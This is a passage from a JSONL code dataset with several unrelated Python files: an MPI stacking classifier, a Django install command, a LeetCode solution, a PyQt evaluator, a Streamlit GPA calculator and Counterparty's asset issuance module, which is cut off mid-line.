rank == 0:\n algorithm = 'ridge'\n clf0 = RidgeClassifier()\n st.fit(clf0, X_train, y_train)\n classification_output = st.predict(clf0, X_test)\n pass\n elif rank == 1:\n algorithm = 'randomForest'\n clf1 = RandomForestClassifier(n_estimators=10)\n st.fit(clf1, X_train, y_train)\n classification_output = st.predict(clf1, X_test)\n pass\n elif rank == 2:\n algorithm = 'lda'\n clf2 = LinearDiscriminantAnalysis()\n st.fit(clf2, X_train, y_train)\n classification_output = st.predict(clf2, X_test)\n pass\n elif rank == 3:\n algorithm = 'GaussianNaiveBayes'\n clf3 = GaussianNB()\n st.fit(clf3, X_train, y_train)\n classification_output = st.predict(clf3, X_test)\n pass\n\n classification_time_end = MPI.Wtime()\n classification_time = classification_time_end - classification_time_start\n print(\n f'[TIME] Process {rank} finished classification by {algorithm} algorithm with time: {classification_time}')\n return classification_output\n\n\ndef train_test(X, y):\n if rank == 0:\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, test_size=0.3, shuffle=False)\n\n data = (X_train, X_test, y_train, y_test)\n else:\n data = None\n program_start_time = MPI.Wtime()\n\n X_train, X_test, y_train, y_test = bcast_data(data)\n\n classification_output = classify(X_train, X_test, y_train, y_test)\n outputs_from_classifications = comm.gather(classification_output)\n # stacking\n if rank == 0:\n voted_data = st.vote(outputs_from_classifications)\n acc = accuracy_score(voted_data, y_test)\n print(f'[ACCURANCY] Final accurancy for test-train is {acc}')\n\n\ndef cross_validation(X, y):\n if rank == 0:\n kf = KFold(n_splits=10, shuffle=True)\n kfold_array = []\n for train_index, test_index in kf.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n kfold_array.append((X_train, X_test, y_train, y_test))\n data = (kfold_array)\n else:\n data = None\n\n data = bcast_data(data)\n accuracies = list()\n count = 0\n for tuple_with_data in data:\n count += 1\n print(\n f\"[INFO] Running cross_validation with {count} chunk of data by {rank} process\")\n X_train, X_test, y_train, y_test = tuple_with_data\n classification_output = classify(X_train, X_test, y_train, y_test)\n outputs_from_classifications = comm.gather(classification_output)\n # stacking\n if rank == 0:\n voted_data = st.vote(outputs_from_classifications)\n acc = accuracy_score(voted_data, y_test)\n\n accuracies.append(acc)\n comm.barrier()\n\n if rank == 0:\n acc_final = np.mean(accuracies)\n print(f'[ACCURANCY] Final accurancy with CV chunks is {acc_final}')\n\n\n# initialize MPI environment\ncomm = MPI.COMM_WORLD\nsize = comm.Get_size()\nrank = comm.Get_rank()\n\nif rank == 0:\n print(f\"[INFO] Program runned in {size} processes\")\n\nprint(f\"[INFO] Hello from process number {rank}\")\n\nif sys.argv[1] == 'MNIST':\n X, y = loader.load_mnist_data()\nelif sys.argv[1] == 'CIFAR-10':\n X, y = loader.load_cifar10_data()\nelif sys.argv[1] == 'CIFAR-100':\n X, y = loader.load_cifar100_data()\nelif sys.argv[1] == 'letter-recognition':\n X, y = loader.load_letter_data()\n\nprogram_start_time = MPI.Wtime()\n\nif sys.argv[2] == 'CV':\n classification_output = cross_validation(X, y)\nelif sys.argv[2] == 'test-train':\n classification_output = train_test(X, y)\n\nprogram_end_time = MPI.Wtime()\nprogram_time = program_end_time - program_start_time\n\nif rank == 0:\n print(f'[INFO] Stacking classifier finish work with time: {program_time}')\n# MPI environment finalization\nMPI.Finalize()\n","repo_name":"codevibess/parallel-stacking-classifier","sub_path":"parallel_flow.py","file_name":"parallel_flow.py","file_ext":"py","file_size_in_byte":5148,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"7402320867","text":"import os\n\nfrom django.conf import settings\nfrom django.core.management import call_command\nfrom rest_framework_api_key.models import APIKey\n\nfrom fedow_core.models import Configuration, Wallet, Asset, Federation, wallet_creator\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.exceptions import InvalidSignature\nimport logging\n\nfrom fedow_core.utils import rsa_generator\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(BaseCommand):\n def add_arguments(self, parser):\n # Positional arguments\n parser.add_argument(\n \"--test\",\n action=\"store_true\",\n help=\"Add test data\",\n )\n\n def handle(self, *args, **options):\n\n try:\n config = Configuration.get_solo()\n self.stdout.write(self.style.ERROR(f'Configuration and master wallet already exists : {config.name}'),\n ending='\\n')\n except Exception as e:\n primary_wallet = wallet_creator(name=\"Primary Wallet\")\n\n instance_name = os.environ.get('DOMAIN', 'fedow.tibillet.localhost')\n config = Configuration(\n name=instance_name,\n domain=instance_name,\n primary_wallet=primary_wallet,\n )\n\n config.save()\n\n call_command(\"assets\",\n '--create',\n '--name', 'Primary Asset',\n '--currency_code', 'FED',\n '--wallet_origin', f'{primary_wallet.uuid}',\n '--category', 'FED')\n\n if Asset.objects.all().count() > 1:\n raise CommandError(\"There is more than one asset, it's not an install nor an empty database.\")\n\n fed_asset = Asset.objects.first()\n if fed_asset.wallet_origin != config.primary_wallet:\n raise CommandError(\"Fedow origin is not primary wallet\")\n\n price_stripe_id_refill_fed = os.environ.get('PRICE_STRIPE_ID_FED')\n if not price_stripe_id_refill_fed:\n price_stripe_id_refill_fed = fed_asset.get_id_price_stripe(force=True)\n fed_asset.id_price_stripe = price_stripe_id_refill_fed\n fed_asset.save()\n\n primary_federation = Federation.objects.create(name=\"Fedow\")\n\n self.stdout.write(\n self.style.SUCCESS(f'Configuration, primary asset, wallet and token created : {instance_name}'),\n ending='\\n')\n","repo_name":"TiBillet/Fedow","sub_path":"fedow_core/management/commands/install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"11418786681","text":"from typing import List\n\n\nclass Solution:\n def groupStrings(self, strings: List[str]) -> List[List[str]]:\n table = {}\n for s in strings:\n offset = ord(s[0]) - ord(\"a\")\n key = \"\".join(chr((ord(c) - ord(\"a\") - offset) % 26 + ord(\"a\")) for c in s)\n table.setdefault(key, []).append(s)\n return [v for v in table.values()]\n","repo_name":"faterazer/LeetCode","sub_path":"0249. Group Shifted Strings/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"20"} +{"seq_id":"3325329962","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#########################################################################################################################################\n#\n# VideoModel Trainer builder By Bertrand NOUVEL\n# 2009 CNRS Postdoctorate JFLI\n#\n# (c) All rights reserved\n# ###############################################\n#\n#########################################################################################################################################\n# Import required objects\n#########################################################################################################################################\n\nimport sys\nfrom pycvf.lib.info.graph import *\nfrom pycvf.core.generic_application import *\nfrom pycvf.lib.ui.qt import qapp\nfrom pycvf.lib.ui import qtdbevaluator\n\n\nclass DbEvaluator(DatabaseUsingApplication):\n class ProgramMetadata(object):\n name=\"Database Show Application\"\n version=\"1.0\"\n author=\"Bertrand Nouvel bertrand.nouvel@gmail.com\"\n copyright=\" COPYRIGHT Bertrand Nouvel - JFLI - CNRS 2009\"\n license=\"GPLv3\"\n\n session=CmdLineString(\"s\",\"session\",\"sessionname\",\"name of the session\",\"std\")\n annfilename=CmdLineString(None,\"weightfile\",\"path\",\"file should be use to store evaluation result\",os.environ[\"HOME\"]+\"/\"+\"weights/$database-$session.pcl\")\n\n @classmethod\n def process(cls,nrels=1,*args,**kwargs): \n annfile=cls.annfilename.value\n annfile=annfile.replace(\"$database\",cls.database.value)\n annfile=annfile.replace(\"$session\",cls.session.value)\n qapp.processEvents()\n try:\n vdbval=pickle.load(file(annfile,\"rb\"))\n except:\n vdbval=None\n d=qtdbevaluator.QtDBEvaluatorDialog(cls.vdb,cls.vdbval)\n qapp.processEvents()\n if d.exec_():\n pickle.dump(d.pwl.vdbval,file(annfile,\"wb\"),protocol=2)\n \n\nif __name__==\"__main__\":\n DbEvaluator.run(sys.argv[1])","repo_name":"bnouvel-wio/pycvf","sub_path":"pycvf/trunk/pycvf/apps/dbevaluator.py","file_name":"dbevaluator.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"7123862827","text":"from copy import deepcopy\n\nimport pandas as pd\nimport plotly.express as px\nimport streamlit as st\n\nusecols = [\"科目大区分\", \"科目中区分\", \"科目\", \"単位数\", \"修得年度\", \"修得学期\", \"評価\", \"評語\", \"合否\"]\n\nst.write(\"[GitHub](https://github.com/youthesame/calc_academic_record.git)\")\nuploaded_file = st.file_uploader(\n \"学務情報システムからダウンロードした 「kakuteiSeisekiCsv.csv」 を選択してください\", type=\"csv\"\n)\nst.write(\"動作しない場合は [こちら](https://forms.gle/SBvfQuE7kAiLGMULA)\")\n\nif uploaded_file is not None:\n try:\n _df = pd.read_csv(uploaded_file, header=3, usecols=usecols, encoding=\"cp932\")\n except ValueError:\n st.error(\"**アップロードされたファイルは処理できません。**もう一度、学務情報システムから成績をダウンロードしてください。\")\n str_replace = {\"S\": 4, \"A\": 3, \"B\": 2, \"C\": 1, \"F\": 0, \"否\": 0, \"合\": 1}\n df = _df.replace(str_replace)\n df[\"点数\"] = df[\"単位数\"] * df[\"評語\"] * df[\"合否\"]\n\n gps = df[\"点数\"].sum()\n gpa = gps / df[\"単位数\"].sum()\n\n # 年度別ヒストグラムの作成\n df[\"修得年度\"] = df[\"修得年度\"].astype(str)\n fig = px.histogram(\n df,\n x=\"修得年度\",\n y=\"点数\",\n color=\"修得学期\",\n labels={\"修得学期\": \"学期\", \"修得年度\": \"年度\", \"点数\": \"grade point\"},\n )\n fig.update_xaxes(title=\"年度\")\n fig.update_yaxes(title=\"GPS\")\n\n # GPS・GPAの詳細\n df[\"修得年度\"] = df[\"修得年度\"].astype(int)\n year_list0 = df[\"修得年度\"].unique().tolist()\n ylen = len(year_list0)\n year_list = deepcopy(year_list0)\n year_list.extend(year_list0)\n year_list.sort()\n semester_list0 = [\"前期\", \"後期\"]\n semester_list = []\n for _ in range(ylen):\n semester_list.extend(semester_list0)\n\n data = pd.DataFrame()\n count = 0\n for year in year_list0:\n for semester in semester_list0:\n tmp_df = df[(df[\"修得年度\"] == year) & (df[\"修得学期\"] == semester)]\n tmp_gps = tmp_df[\"点数\"].sum()\n data.at[f\"{count}\", \"GPS\"] = tmp_gps\n data.at[f\"{count}\", \"GPA\"] = tmp_gps / tmp_df[\"単位数\"].sum()\n count += 1\n\n ndata = data.values\n record_df = pd.DataFrame(\n data=ndata, index=([year_list, semester_list]), columns=data.columns\n )\n record_df[\"GPS\"] = record_df[\"GPS\"].astype(int)\n record_df.loc[\"Total\", :] = [gps, gpa]\n\n eval_series = _df[\"評語\"].value_counts()\n eval_series.name = \"取得数\"\n\n subject_series = pd.Series(dtype=\"int64\")\n sbject_list = df[\"科目中区分\"].unique().tolist()\n for subject in sbject_list:\n a = df[(df[\"科目中区分\"] == subject) & (df[\"合否\"] == 1)]\n subject_series[subject] = a[\"単位数\"].sum()\n subject_series[\"Total\"] = subject_series.sum()\n subject_series.name = \"取得単位数\"\n\n # streamlitで表示\n st.header(\"成績表\")\n st.table(record_df)\n st.header(\"成績推移\")\n st.plotly_chart(fig, use_container_width=True)\n st.header(\"評価数\")\n st.table(eval_series)\n st.header(\"科目別単位数\")\n st.table(subject_series)\n st.header(\"詳細\")\n st.dataframe(_df)\n","repo_name":"youthesame/calc_academic_record","sub_path":"calc_academic_record.py","file_name":"calc_academic_record.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"17070595122","text":"from train import run_train\r\nfrom predict import predict\r\n\r\n\r\ndef run_training():\r\n run_train()\r\n\r\n\r\ndef run_predict():\r\n predict(6)\r\n\r\n# Option 1: Run the training, 2: Run the prediction\r\n\r\n\r\nif __name__ == \"__main__\":\r\n option = input(\"Enter 1 to train the model or 2 to predict: \")\r\n if option == \"1\":\r\n run_training()\r\n elif option == \"2\":\r\n run_predict()\r\n else:\r\n print(\"Invalid option\")\r\n","repo_name":"HJacksons/NN-MNIST","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"34127685978","text":"#! /usr/bin/python3\n\n\"\"\"\nAllow simultaneous lock and transfer.\n\"\"\"\n\nimport struct\nimport decimal\nimport json\nimport logging\nlogger = logging.getLogger(__name__)\nD = decimal.Decimal\n\nfrom counterpartylib.lib import (config, util, exceptions, util, message_type)\n\nFORMAT_1 = '>QQ?'\nLENGTH_1 = 8 + 8 + 1\nFORMAT_2 = '>QQ??If'\nLENGTH_2 = 8 + 8 + 1 + 1 + 4 + 4\nSUBASSET_FORMAT = '>QQ?B'\nSUBASSET_FORMAT_LENGTH = 8 + 8 + 1 + 1\nID = 20\nSUBASSET_ID = 21\n# NOTE: Pascal strings are used for storing descriptions for backwards‐compatibility.\n\n#Lock Reset issuances. Default composed message\nLR_ISSUANCE_ID = 22\nLR_SUBASSET_ID = 23\n\nDESCRIPTION_MARK_BYTE = b'\\xc0'\nDESCRIPTION_NULL_ACTION = \"NULL\"\n\ndef initialise(db):\n cursor = db.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS issuances(\n tx_index INTEGER PRIMARY KEY,\n tx_hash TEXT UNIQUE,\n block_index INTEGER,\n asset TEXT,\n quantity INTEGER,\n divisible BOOL,\n source TEXT,\n issuer TEXT,\n transfer BOOL,\n callable BOOL,\n call_date INTEGER,\n call_price REAL,\n description TEXT,\n fee_paid INTEGER,\n locked BOOL,\n status TEXT,\n asset_longname TEXT,\n reset BOOL,\n FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index))\n ''')\n\n # Add asset_longname for sub-assets\n # SQLite can’t do `ALTER TABLE IF COLUMN NOT EXISTS`.\n columns = [column['name'] for column in cursor.execute('''PRAGMA table_info(issuances)''')]\n if 'asset_longname' not in columns:\n cursor.execute('''ALTER TABLE issuances ADD COLUMN asset_longname TEXT''')\n if 'reset' not in columns:\n cursor.execute('''ALTER TABLE issuances ADD COLUMN reset BOOL''')\n\n # If sweep_hotfix activated, Create issuances copy, copy old data, drop old table, rename new table, recreate indexes\n # SQLite can’t do `ALTER TABLE IF COLUMN NOT EXISTS` nor can drop UNIQUE constraints\n if 'msg_index' not in columns:\n cursor.execute('''CREATE TABLE IF NOT EXISTS new_issuances(\n tx_index INTEGER,\n tx_hash TEXT,\n msg_index INTEGER DEFAULT 0,\n block_index INTEGER,\n asset TEXT,\n quantity INTEGER,\n divisible BOOL,\n source TEXT,\n issuer TEXT,\n transfer BOOL,\n callable BOOL,\n call_date INTEGER,\n call_price REAL,\n description TEXT,\n fee_paid INTEGER,\n locked BOOL,\n status TEXT,\n asset_longname TEXT,\n reset BOOL,\n PRIMARY KEY (tx_index, msg_index),\n FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index),\n UNIQUE (tx_hash, msg_index))\n ''')\n cursor.execute('''INSERT INTO new_issuances(tx_index, tx_hash, msg_index,\n block_index, asset, quantity, divisible, source, issuer, transfer, callable,\n call_date, call_price, description, fee_paid, locked, status, asset_longname, reset)\n SELECT tx_index, tx_hash, 0, block_index, asset, quantity, divisible, source,\n issuer, transfer, callable, call_date, call_price, description, fee_paid,\n locked, status, asset_longname, reset FROM issuances''', {})\n cursor.execute('DROP TABLE issuances')\n cursor.execute('ALTER TABLE new_issuances RENAME TO issuances')\n\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n block_index_idx ON issuances (block_index)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n valid_asset_idx ON issuances (asset, status)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n status_idx ON issuances (status)\n ''')\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n source_idx ON issuances (source)\n ''')\n\n cursor.execute('''CREATE INDEX IF NOT EXISTS\n asset_longname_idx ON issuances (asset_longname)\n ''')\n\ndef validate (db, source, destination, asset, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, block_index):\n problems = []\n fee = 0\n\n if asset in (config.BTC, config.XCP):\n problems.append('cannot issue {} or {}'.format(config.BTC, config.XCP))\n\n if call_date is None: call_date = 0\n if call_price is None: call_price = 0.0\n if description is None: description = \"\"\n if divisible is None: divisible = True\n if lock is None: lock = False\n if reset is None: reset = False\n\n if isinstance(call_price, int): call_price = float(call_price)\n #^ helps especially with calls from JS‐based clients, where parseFloat(15) returns 15 (not 15.0), which json takes as an int\n\n if not isinstance(quantity, int):\n problems.append('quantity must be in satoshis')\n return call_date, call_price, problems, fee, description, divisible, None, None\n if call_date and not isinstance(call_date, int):\n problems.append('call_date must be epoch integer')\n return call_date, call_price, problems, fee, description, divisible, None, None\n if call_price and not isinstance(call_price, float):\n problems.append('call_price must be a float')\n return call_date, call_price, problems, fee, description, divisible, None, None\n\n if quantity < 0: problems.append('negative quantity')\n if call_price < 0: problems.append('negative call price')\n if call_date < 0: problems.append('negative call date')\n\n # Callable, or not.\n if not callable_:\n if block_index >= 312500 or config.TESTNET or config.REGTEST: # Protocol change.\n call_date = 0\n call_price = 0.0\n elif block_index >= 310000: # Protocol change.\n if call_date:\n problems.append('call date for non‐callable asset')\n if call_price:\n problems.append('call price for non‐callable asset')\n\n # Valid re-issuance?\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset))\n issuances = cursor.fetchall()\n cursor.close()\n reissued_asset_longname = None\n if issuances:\n reissuance = True\n last_issuance = issuances[-1]\n reissued_asset_longname = last_issuance['asset_longname']\n issuance_locked = False\n if util.enabled('issuance_lock_fix'):\n for issuance in issuances:\n if issuance['locked']:\n issuance_locked = True\n break\n elif last_issuance['locked']:\n # before the issuance_lock_fix, only the last issuance was checked\n issuance_locked = True\n\n if last_issuance['issuer'] != source:\n problems.append('issued by another address')\n if (bool(last_issuance['divisible']) != bool(divisible)) and ((not util.enabled(\"cip03\", block_index)) or (not reset)):\n problems.append('cannot change divisibility')\n if (not util.enabled(\"issuance_callability_parameters_removal\", block_index)) and bool(last_issuance['callable']) != bool(callable_):\n problems.append('cannot change callability')\n if last_issuance['call_date'] > call_date and (call_date != 0 or (block_index < 312500 and (not config.TESTNET or not config.REGTEST))):\n problems.append('cannot advance call date')\n if last_issuance['call_price'] > call_price:\n problems.append('cannot reduce call price')\n if issuance_locked and quantity:\n problems.append('locked asset and non‐zero quantity')\n if issuance_locked and reset:\n problems.append('cannot reset a locked asset')\n else:\n reissuance = False\n if description.lower() == 'lock':\n problems.append('cannot lock a non‐existent asset')\n #if destination:\n # problems.append('cannot transfer a non‐existent asset')\n if reset:\n problems.append('cannot reset a non existent asset')\n\n # validate parent ownership for subasset\n if subasset_longname is not None and not reissuance:\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', subasset_parent))\n parent_issuances = cursor.fetchall()\n cursor.close()\n if parent_issuances:\n last_parent_issuance = parent_issuances[-1]\n if last_parent_issuance['issuer'] != source:\n problems.append('parent asset owned by another address')\n else:\n problems.append('parent asset not found')\n\n # validate subasset issuance is not a duplicate\n if subasset_longname is not None and not reissuance:\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM assets \\\n WHERE (asset_longname = ?)''', (subasset_longname,))\n assets = cursor.fetchall()\n if len(assets) > 0:\n problems.append('subasset already exists')\n\n # validate that the actual asset is numeric\n if asset[0] != 'A':\n problems.append('a subasset must be a numeric asset')\n\n\n\n # Check for existence of fee funds.\n if quantity or (block_index >= 315000 or config.TESTNET or config.REGTEST): # Protocol change.\n if not reissuance or (block_index < 310000 and not config.TESTNET and not config.REGTEST): # Pay fee only upon first issuance. (Protocol change.)\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM balances \\\n WHERE (address = ? AND asset = ?)''', (source, config.XCP))\n balances = cursor.fetchall()\n cursor.close()\n if util.enabled('numeric_asset_names'): # Protocol change.\n if subasset_longname is not None and util.enabled('subassets'): # Protocol change.\n # subasset issuance is 0.25\n fee = int(0.25 * config.UNIT)\n elif len(asset) >= 13:\n fee = 0\n else:\n fee = int(0.5 * config.UNIT)\n elif block_index >= 291700 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = int(0.5 * config.UNIT)\n elif block_index >= 286000 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = 5 * config.UNIT\n elif block_index > 281236 or config.TESTNET or config.REGTEST: # Protocol change.\n fee = 5\n if fee and (not balances or balances[0]['quantity'] < fee):\n problems.append('insufficient funds')\n\n if not (block_index >= 317500 or config.TESTNET or config.REGTEST): # Protocol change.\n if len(description) > 42:\n problems.append('description too long')\n\n # For SQLite3\n call_date = min(call_date, config.MAX_INT)\n assert isinstance(quantity, int)\n if reset and util.enabled(\"cip03\", block_index):#reset will overwrite the quantity\n if quantity > config.MAX_INT:\n problems.append('total quantity overflow') \n else:\n total = sum([issuance['quantity'] for issuance in issuances])\n if total + quantity > config.MAX_INT:\n problems.append('total quantity overflow')\n\n if util.enabled(\"cip03\", block_index) and reset and issuances:\n cursor = db.cursor()\n #Checking that all supply are held by the owner of the asset\n cursor.execute('''SELECT * FROM balances \\\n WHERE asset = ? AND quantity > 0''', (asset,))\n balances = cursor.fetchall()\n cursor.close()\n \n if (len(balances) == 0):\n if util.asset_supply(db, asset) > 0:\n problems.append('Cannot reset an asset with no holder')\n elif (len(balances) > 1):\n problems.append('Cannot reset an asset with many holders')\n elif (len(balances) == 1):\n if (balances[0]['address'] != last_issuance[\"issuer\"]):\n problems.append('Cannot reset an asset held by a different address than the owner')\n\n #if destination and quantity:\n # problems.append('cannot issue and transfer simultaneously')\n\n # For SQLite3\n if util.enabled('integer_overflow_fix', block_index=block_index) and (fee > config.MAX_INT or quantity > config.MAX_INT):\n problems.append('integer overflow')\n\n return call_date, call_price, problems, fee, description, divisible, lock, reset, reissuance, reissued_asset_longname\n\n\ndef compose (db, source, transfer_destination, asset, quantity, divisible, lock, reset, description):\n\n # Callability is deprecated, so for re‐issuances set relevant parameters\n # to old values; for first issuances, make uncallable.\n cursor = db.cursor()\n cursor.execute('''SELECT * FROM issuances \\\n WHERE (status = ? AND asset = ?)\n ORDER BY tx_index ASC''', ('valid', asset))\n issuances = cursor.fetchall()\n if issuances:\n last_issuance = issuances[-1]\n callable_ = last_issuance['callable']\n call_date = last_issuance['call_date']\n call_price = last_issuance['call_price']\n else:\n callable_ = False\n call_date = 0\n call_price = 0.0\n cursor.close()\n\n # check subasset\n subasset_parent = None\n subasset_longname = None\n if util.enabled('subassets'): # Protocol change.\n subasset_parent, subasset_longname = util.parse_subasset_from_asset_name(asset)\n if subasset_longname is not None:\n # try to find an existing subasset\n sa_cursor = db.cursor()\n sa_cursor.execute('''SELECT * FROM assets \\\n WHERE (asset_longname = ?)''', (subasset_longname,))\n assets = sa_cursor.fetchall()\n sa_cursor.close()\n if len(assets) > 0:\n # this is a reissuance\n asset = assets[0]['asset_name']\n else:\n # this is a new issuance\n # generate a random numeric asset id which will map to this subasset\n asset = util.generate_random_asset()\n\n asset_id = util.generate_asset_id(asset, util.CURRENT_BLOCK_INDEX)\n asset_name = util.generate_asset_name(asset_id, util.CURRENT_BLOCK_INDEX) #This will remove leading zeros in the numeric assets\n \n call_date, call_price, problems, fee, validated_description, divisible, lock, reset, reissuance, reissued_asset_longname = validate(db, source, transfer_destination, asset_name, quantity, divisible, lock, reset, callable_, call_date, call_price, description, subasset_parent, subasset_longname, util.CURRENT_BLOCK_INDEX)\n if problems: raise exceptions.ComposeError(problems)\n\n if subasset_longname is None or reissuance:\n asset_format = util.get_value_by_block_index(\"issuance_asset_serialization_format\")\n asset_format_length = util.get_value_by_block_index(\"issuance_asset_serialization_length\")\n \n # Type 20 standard issuance FORMAT_2 >QQ??If\n # used for standard issuances and all reissuances\n if util.enabled(\"issuance_backwards_compatibility\"):\n data = message_type.pack(LR_ISSUANCE_ID)\n else: \n data = message_type.pack(ID)\n \n if description == None and util.enabled(\"issuance_description_special_null\"):\n #a special message is created to be catched by the parse function\n curr_format = asset_format + '{}s'.format(len(DESCRIPTION_MARK_BYTE)+len(DESCRIPTION_NULL_ACTION))\n encoded_description = DESCRIPTION_MARK_BYTE+DESCRIPTION_NULL_ACTION.encode('utf-8')\n else:\n if (len(validated_description) <= 42) and not util.enabled('pascal_string_removed'):\n curr_format = FORMAT_2 + '{}p'.format(len(validated_description) + 1)\n else:\n curr_format = asset_format + '{}s'.format(len(validated_description))\n \n encoded_description = validated_description.encode('utf-8')\n \n \n \n \n if (asset_format_length <= 19):# callbacks parameters were removed\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, encoded_description)\n elif (asset_format_length <= 26):\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n elif (asset_format_length <= 27):# param reset was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if reset else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n elif (asset_format_length <= 28):# param lock was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, 1 if callable_ else 0,\n call_date or 0, call_price or 0.0, encoded_description)\n else:\n subasset_format = util.get_value_by_block_index(\"issuance_subasset_serialization_format\",util.CURRENT_BLOCK_INDEX)\n subasset_format_length = util.get_value_by_block_index(\"issuance_subasset_serialization_length\",util.CURRENT_BLOCK_INDEX)\n\n # Type 21 subasset issuance SUBASSET_FORMAT >QQ?B\n # Used only for initial subasset issuance\n # compacts a subasset name to save space\n compacted_subasset_longname = util.compact_subasset_longname(subasset_longname)\n compacted_subasset_length = len(compacted_subasset_longname)\n if util.enabled(\"issuance_backwards_compatibility\"):\n data = message_type.pack(LR_SUBASSET_ID)\n else: \n data = message_type.pack(SUBASSET_ID)\n \n if description == None and util.enabled(\"issuance_description_special_null\"):\n #a special message is created to be catched by the parse function\n curr_format = subasset_format + '{}s'.format(compacted_subasset_length) + '{}s'.format(len(DESCRIPTION_MARK_BYTE)+len(DESCRIPTION_NULL_ACTION))\n encoded_description = DESCRIPTION_MARK_BYTE+DESCRIPTION_NULL_ACTION.encode('utf-8')\n else: \n curr_format = subasset_format + '{}s'.format(compacted_subasset_length) + '{}s'.format(len(validated_description)) \n encoded_description = validated_description.encode('utf-8')\n \n if subasset_format_length <= 18:\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description)\n elif subasset_format_length <= 19:# param reset was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if reset else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description) \n elif subasset_format_length <= 20:# param lock was inserted\n data += struct.pack(curr_format, asset_id, quantity, 1 if divisible else 0, 1 if lock else 0, 1 if reset else 0, compacted_subasset_length, compacted_subasset_longname, encoded_description)\n\n if transfer_destination:\n destination_outputs = [(transfer_destination, None)]\n else:\n destination_outputs = []\n return (source, destination_outputs, data)\n\ndef parse (db, tx, message, message_type_id):\n issuance_parse_cursor = db.cursor()\n asset_format = util.get_value_by_block_index(\"issuance_asset_serialization_format\",tx['block_index'])\n asset_format_length = util.get_value_by_block_index(\"issuance_asset_serialization_length\",tx['block_index'])\n subasset_format = util.get_value_by_block_index(\"issuance_subasset_serialization_format\",tx['block_index'])\n subasset_format_length = util.get_value_by_block_index(\"issuance_subasset_serialization_length\",tx['block_index'])\n\n # Unpack message.\n try:\n subasset_longname = None\n if message_type_id == LR_SUBASSET_ID or message_type_id == SUBASSET_ID:\n if not util.enabled('subassets', block_index=tx['block_index']):\n logger.warn(\"subassets are not enabled at block %s\" % tx['block_index'])\n raise exceptions.UnpackError\n\n # parse a subasset original issuance message\n lock = None\n reset = None\n \n if subasset_format_length <= 18:\n asset_id, quantity, divisible, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length])\n elif subasset_format_length <= 19:# param reset was inserted\n asset_id, quantity, divisible, reset, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length]) \n elif subasset_format_length <= 20:# param lock was inserted\n asset_id, quantity, divisible, lock, reset, compacted_subasset_length = struct.unpack(subasset_format, message[0:subasset_format_length])\n \n description_length = len(message) - subasset_format_length - compacted_subasset_length\n if description_length < 0:\n logger.warn(\"invalid subasset length: [issuance] tx [%s]: %s\" % (tx['tx_hash'], compacted_subasset_length))\n raise exceptions.UnpackError\n messages_format = '>{}s{}s'.format(compacted_subasset_length, description_length)\n compacted_subasset_longname, description = struct.unpack(messages_format, message[subasset_format_length:])\n subasset_longname = util.expand_subasset_longname(compacted_subasset_longname)\n callable_, call_date, call_price = False, 0, 0.0\n try:\n description = description.decode('utf-8')\n except UnicodeDecodeError:\n description_data = description\n description = ''\n if description_data[0:1] == DESCRIPTION_MARK_BYTE:\n try:\n if description_data[1:].decode('utf-8') == DESCRIPTION_NULL_ACTION:\n description = None\n except UnicodeDecodeError:\n description = '' \n elif (tx['block_index'] > 283271 or config.TESTNET or config.REGTEST) and len(message) >= asset_format_length: # Protocol change.\n if (len(message) - asset_format_length <= 42) and not util.enabled('pascal_string_removed'):\n curr_format = asset_format + 